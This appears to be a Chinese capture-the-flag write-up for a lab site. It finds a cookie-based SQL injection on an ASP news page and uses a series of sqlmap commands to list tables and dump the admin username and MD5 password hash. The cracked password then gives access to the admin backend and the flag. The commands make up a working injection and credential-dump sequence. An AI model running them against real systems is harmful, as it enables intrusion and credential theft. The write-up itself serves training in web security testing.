题目
解题过程
进入网站
随便点击一个新闻,出现参数id,进行单引号测试:
提示参数不能包含非法字符,应该是黑名单过滤
猜测是cookie注入
burp抓包,将参数放入cookie中,页面正常访问:
单引号测试,页面报错,没有警告弹出
sqlmap跑出payload
python sqlmap.py -u “http://kypt8004.ia.aqlab.cn/shownews.asp?” --cookie=“id=171” --level 2
跑出表
python sqlmap.py -u “http://kypt8004.ia.aqlab.cn/shownews.asp?” --cookie=“id=171” --level 2 --tables
跑出admin表的列
python sqlmap.py -u “http://kypt8004.ia.aqlab.cn/shownews.asp?” --cookie=“id=171” --level 2 -T admin --column
跑出username和password的数据
python sqlmap.py -u “http://kypt8004.ia.aqlab.cn/shownews.asp?” --cookie=“id=171” --level 2 --dump -T admin -C username,password
password的值在线解md5后结果为welcome
用户名为admin,密码为welcome
我们去找一下网站的后台
直接在网站后加/admin ,进入后台
输入账号密码,进入后台,获取flag